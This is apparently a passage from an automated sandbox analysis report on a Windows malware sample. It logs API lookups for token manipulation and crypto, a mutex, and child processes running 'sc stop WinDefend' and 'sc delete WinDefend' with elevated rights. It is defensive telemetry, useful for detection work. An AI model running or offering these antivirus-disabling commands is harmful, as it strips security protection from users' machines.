| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetVersionExW, address_out = 0x77b2d910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcess, address_out = 0x77b35cf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x77b33f40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessId, address_out = 0x77b35a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrlenA, address_out = 0x77b3caf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x77bb9330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x77b39b70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentThreadId, address_out = 0x77b33ee0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x77b36500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x77b365e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WideCharToMultiByte, address_out = 0x77b435f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = MultiByteToWideChar, address_out = 0x77b35b50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = Process32FirstW, address_out = 0x77b21e00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = Process32NextW, address_out = 0x77b220f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x77b221e0 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x7feff0e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameW, address_out = 0x7feff0f1fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetTokenInformation, address_out = 0x7feff0fbd50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = LookupAccountSidW, address_out = 0x7feff0fb898 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = DuplicateTokenEx, address_out = 0x7feff0ed310 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CreateProcessAsUserW, address_out = 0x7feff0eafe8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = EqualSid, address_out = 0x7feff0fb820 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = OpenProcessToken, address_out = 0x7feff0fbd70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = FreeSid, address_out = 0x7feff0fb818 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x7feff0fb63c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptDestroyKey, address_out = 0x7feff0eafa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptHashData, address_out = 0x7feff0edac0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptDestroyHash, address_out = 0x7feff0edb00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptDecrypt, address_out = 0x7feff11b6d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptCreateHash, address_out = 0x7feff0edad4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptImportKey, address_out = 0x7feff0eaf6c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x7feff0f2040 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptReleaseContext, address_out = 0x7feff0edd10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptSetKeyParam, address_out = 0x7feff11b508 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7feff0ed98c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptGetHashParam, address_out = 0x7feff0edb20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x7feff0fb9e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x7feff0fb9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RevertToSelf, address_out = 0x7feff0edd00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegCreateKeyExW, address_out = 0x7feff0fb520 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x7feff100710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7feff1006f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegSetValueExW, address_out = 0x7feff0f1ed0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x7feff0e89a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SetSecurityInfo, address_out = 0x7feff0e8420 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetSecurityInfo, address_out = 0x7feff0ea8e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SetEntriesInAclW, address_out = 0x7feff0f3540 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetLengthSid, address_out = 0x7feff0fb580 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CopySid, address_out = 0x7feff0fbda0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x7feff0fb504 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x7feff0fb5a0 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x7feffa40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7feffa67490 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoUninitialize, address_out = 0x7feffa61314 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x7fefddf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\crypt32.dll, function = CryptStringToBinaryW, address_out = 0x7fefde3e9a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\crypt32.dll, function = CryptBinaryToStringW, address_out = 0x7fefde24198 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x7feff640000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = PathFindFileNameW, address_out = 0x7feff653920 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = PathAddBackslashW, address_out = 0x7feff653f70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x7feff66e6c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrStrIW, address_out = 0x7feff64fb70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x7feff64d014 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x7feff64a43c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7feff652b00 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77c40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = NtQueryInformationProcess, address_out = 0x77c914a0 |
|
1 | |
| Module | Load | module_name = IPHLPAPI.dll, base_address = 0x7fefb680000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x7fefb68792c |
|
1 | |
| Module | Load | module_name = USERENV.dll, base_address = 0x7fefcf30000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\userenv.dll, function = CreateEnvironmentBlock, address_out = 0x7fefcf310b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\userenv.dll, function = DestroyEnvironmentBlock, address_out = 0x7fefcf31080 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\userenv.dll, function = LoadUserProfileW, address_out = 0x7fefcf31170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\userenv.dll, function = UnloadUserProfile, address_out = 0x7fefcf33670 |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1000 | |
| Module | Get Filename | module_name = WS2_32.dll, process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.exe, size = 512 |
|
1 | |
| System | Get Time | type = Ticks, time = 217059 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = Ncrypt.dll, base_address = 0x7fefd620000 |
|
1 | |
| Module | Load | module_name = Bcrypt.dll, base_address = 0x7fefd5f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ncrypt.dll, function = NCryptOpenStorageProvider, address_out = 0x7fefd629990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ncrypt.dll, function = NCryptImportKey, address_out = 0x7fefd6255f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ncrypt.dll, function = NCryptDeleteKey, address_out = 0x7fefd64f6a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ncrypt.dll, function = NCryptFreeObject, address_out = 0x7fefd625c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\bcrypt.dll, function = BCryptOpenAlgorithmProvider, address_out = 0x7fefd5f2640 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\bcrypt.dll, function = BCryptImportKeyPair, address_out = 0x7fefd5f1d30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\bcrypt.dll, function = BCryptGetProperty, address_out = 0x7fefd5f1510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\bcrypt.dll, function = BCryptVerifySignature, address_out = 0x7fefd605bc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\bcrypt.dll, function = BCryptCloseAlgorithmProvider, address_out = 0x7fefd5f32b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\bcrypt.dll, function = BCryptDestroyKey, address_out = 0x7fefd5f16a0 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Mutex | Create | mutex_name = Global\E0B7509842600 |
|
1 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x77b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapAlloc, address_out = 0x77c933a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetProcessHeap, address_out = 0x77b43050 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapFree, address_out = 0x77b43070 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapReAlloc, address_out = 0x77c73f20 |
|
1 | |
| Module | Get Filename | module_name = WS2_32.dll, process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.tmp, type = file_attributes |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | module_name = WS2_32.dll, process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.exe, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| COM | Create | interface = 2FABA4C7-4DA9-4013-9697-20CC3FD40F85, cls_context = CLSCTX_INPROC_SERVER |
|
1 |
Process #22: sc.exe
9
0
| Information | Value |
|---|---|
| ID | #22 |
| File Name | c:\windows\syswow64\sc.exe |
| Command Line | sc stop WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:20, Reason: Child Process |
| Unmonitor | End Time: 00:02:22, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa6c |
| Parent PID | 0x528 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A7C
0x
A54
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | rw |
|
|
|
- |
| sc.exe | 0x00080000 | 0x0008bfff | Memory Mapped File | rwx |
|
|
|
- |
| sc.exe.mui | 0x00090000 | 0x0009ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00110000 | 0x00176fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x0076ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Threads
Thread 0xa7c
9
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-12-06 22:28:02 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 191569 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\sc.exe, base_address = 0x80000 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Control | service_name = WinDefend |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 349 |
|
1 |
Process #23: sc.exe
9
0
| Information | Value |
|---|---|
| ID | #23 |
| File Name | c:\windows\syswow64\sc.exe |
| Command Line | sc delete WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:20, Reason: Child Process |
| Unmonitor | End Time: 00:02:22, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9b8 |
| Parent PID | 0x600 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9C8
0x
9C0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | rw |
|
|
|
- |
| sc.exe | 0x00080000 | 0x0008bfff | Memory Mapped File | rwx |
|
|
|
- |
| sc.exe.mui | 0x00090000 | 0x0009ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001b0000 | 0x00216fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Threads
Thread 0x9c8
9
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-12-06 22:28:02 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 191803 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\sc.exe, base_address = 0x80000 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Delete | service_name = WinDefend |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 28 |
|
1 |
Process #24: taskeng.exe
0
0
| Information | Value |
|---|---|
| ID | #24 |
| File Name | c:\windows\system32\taskeng.exe |
| Command Line | taskeng.exe {B695F367-0160-4949-AEB5-6C2E65CBA0C5} S-1-5-18:NT AUTHORITY\System:Service: |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:20, Reason: Child Process |
| Unmonitor | End Time: 00:04:37, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:17 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa58 |
| Parent PID | 0x36c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
A70
0x
B9C
0x
BA4
0x
B94
0x
BA8
0x
B48
0x
5C8
0x
620
0x
84C
0x
848
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x0017ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000180000 | 0x00180000 | 0x00181fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0040ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x00410fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x00420fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004b0000 | 0x004b0000 | 0x004b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x0059ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x00727fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000730000 | 0x00730000 | 0x008b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008c0000 | 0x008c0000 | 0x00cb2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ce0000 | 0x00ce0000 | 0x00d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d90000 | 0x00d90000 | 0x00e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ee0000 | 0x00ee0000 | 0x00fdffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010d0000 | 0x010d0000 | 0x0114ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01150000 | 0x0141efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001440000 | 0x01440000 | 0x014bffff | Private Memory | rw |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| taskeng.exe | 0xff2b0000 | 0xff323fff | Memory Mapped File | rwx |
|
|
|
- |
